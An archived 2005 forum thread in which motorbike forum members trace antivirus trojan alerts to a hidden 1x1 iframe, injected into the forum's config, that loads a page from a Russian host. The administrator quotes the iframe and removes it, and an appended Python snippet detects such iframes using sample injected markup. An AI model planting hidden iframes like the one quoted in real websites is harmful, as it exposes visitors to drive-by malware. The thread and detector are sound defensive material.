View Full Version : trojan - FIXED


eleven80
12-04-2005, 10:40 PM
nice forum..

just thought you'd like to know that mcafee detects a virus (trojan) on every page of this forum, pain in the arse!

Dan
13-04-2005, 06:07 AM
Did you click on any of the links sent in that spam email the other day?

eleven80
13-04-2005, 07:32 AM
nope, only signed up yesterday...

mcafee is usually pretty good with picking up stuff other virus checkers don't, though.. might want to check it out.

Anonymous
13-04-2005, 07:43 AM
yep

this is what the work anti V SW is deleting

JS/Exploit-HelpXSite

it's a trojan and i did not click on any emails. in fact i use a dif.. email address.

Spanky
13-04-2005, 07:44 AM
that was me BTW

eleven80
13-04-2005, 01:25 PM
this is what the work anti V SW is deleting

JS/Exploit-HelpXSite

it's a trojan and i did not click on any emails. in fact i use a dif.. email address.

that's the one, m8

Dan
13-04-2005, 02:52 PM
So are you all saying you get that when you visit any page on the forum? That doesn't make sense... since it was hacked I replaced every single file that the forum uses... ahhh, but i did copy back the avatars and rank logos... maybe it's hidden in one of those.

Let me know if it's still happening (and what pages cause it) and i'll remove the avatars and rank images to see if it stops.

Dan.

Anonymous
13-04-2005, 03:28 PM
all of em and every time i move from one page to another

and it's still happening

Spanky

Lateshift
13-04-2005, 05:10 PM
Have you ensured that you have all the critical updates from Microsoft?

I kept getting a script trying to run every time i refreshed a page on this website, i had missed an update that addresses the problem, installed it and it is no longer a problem ;)

test your browser here ;)

http://bcheck.scanit.be/bcheck/

eleven80
13-04-2005, 05:22 PM
my browser's fine apparently.

i think the problem you were experiencing is non-perfect code pushing the browser to ask you if you want to debug. that message has stopped appearing a few updates ago, as the general user didn't know how to turn it off.

the problem is a trojan somewhere in this forum's code exploiting java and it's quite likely that you don't know about it because your antivirus software hasn't picked it up.

if i were you i'd run an online scan here (http://housecall.trendmicro.com) and see if anything comes up.

Lateshift
13-04-2005, 05:43 PM
Mine wasn't a script debug, it was a command prompt being opened ;) and a request for netlog.hta ;)

The bug was associated with quite a few trojans/Virii up until Microsoft released a patch that closed the vulnerability.

eleven80
13-04-2005, 07:16 PM
it's stopped coming up now... how strange.. back to bikes! :D

Lateshift
13-04-2005, 07:43 PM
I think the trojan or at least the hijack is still in place, on the front of the site if you hover the mouse over the forum icon, and look at the bottom of the status bar on the browser it should show the www.essexbikers.co.uk/forum address.

However once you have clicked that, if when the forums index opens you use the drop down menu of Internet Explorer's "back" button it seems to be showing a Russian address resolving to techlabs.ru as the page that was previously visited.

Is the site hosted there?

Also if you then try to click on the last link (i.e. http://techlabs.ru/templates blah blah) it does nothing at all

But if you then click on the drop down menu for the "forward" button it is showing a 404 error file not found.

Weird

Also i noticed on my browser that as it enters the forum, at the bottom of the status bar it is trying to resolve somewhere else, getting kicked out and then booted back to essex bikers.

And lastly since this started i can't just click back on my browser, i have to click twice each time now.

I have taken screen shots to show what i mean, if you want them Dan (if this is sounding suspicious) then let me know.

Dan
13-04-2005, 08:40 PM
Thanks for all that info.

I've just tried to do as you say, but the address does not appear in my back list. Can you mail me the screenshots or post them on here?

Thanks.

Dan.

Dan
13-04-2005, 08:41 PM
well well well... look what i just found hidden in the code on the site:

"iframe src=http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie/index.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe"

Dan
13-04-2005, 08:45 PM
Lateshift - I've sussed the problem. It was hidden in the config, not the files that run the site itself.

It's been removed now so you shouldn't get the problem anymore (unless they hid it anywhere else).

Let me know.

Thanks again.

Dan.
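
The find described above (an invisible 1x1 iframe sitting in a stored config value rather than in the forum's files) can be checked for mechanically. The following is an added example, not part of the original thread or the forum software: it scans configuration strings for iframes that are both invisible and load from another host. The setting names and hosts in the sample are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # attribute values are None when the attribute has no value
            self.iframes.append({k: (v or "") for k, v in attrs})

def tiny(value):
    """True for a dimension of 0 or 1 pixel ("0", "1", "1px")."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value.lower())
    return bool(m) and int(m.group(1)) <= 1

def hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return tiny(attrs.get("width", "")) and tiny(attrs.get("height", ""))

def find_hidden_offsite_iframes(settings, site_host):
    """Return (setting_name, src) for each invisible iframe that loads another host."""
    findings = []
    for name, value in settings.items():
        parser = IframeCollector()
        parser.feed(value)
        for attrs in parser.iframes:
            host = (urlparse(attrs.get("src", "")).hostname or "").lower()
            same_site = host == site_host or host.endswith("." + site_host)
            if host and not same_site and hidden(attrs):
                findings.append((name, attrs["src"]))
    return findings

# Constructed sample: setting names and hosts are hypothetical.
SAMPLE_SETTINGS = {
    "site_desc": "Bikes and ride-outs",
    "footer_html": '<iframe src=http://injected.example/ie/index.php frameborder="0" '
                   'width="1" height="1" scrolling="no" name=counter></iframe>',
    "video_embed": '<iframe src="http://media.example/player" width="480" height="360"></iframe>',
    "stats": '<iframe src="http://forum.example/stats.php" width="1" height="1"></iframe>',
}
print(find_hidden_offsite_iframes(SAMPLE_SETTINGS, "forum.example"))
```

Only the `footer_html` entry is reported: the visible off-site embed and the same-site 1x1 frame are left alone, which keeps the check usable on a forum that has legitimate embeds.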

Lateshift
13-04-2005, 08:51 PM
That seems to have sorted it Dan, thought something looked amiss and my cynicism led me to it :D

Well i am just nosey and like to look at code :D

Biker Dude
13-04-2005, 10:06 PM
w00t aren't u the lil private eye investigator.... good job lad :lol:

eleven80
14-04-2005, 07:18 AM
nice 1

Anonymous
14-04-2005, 10:20 AM
yep it's fixed for me too

well done dan

spanky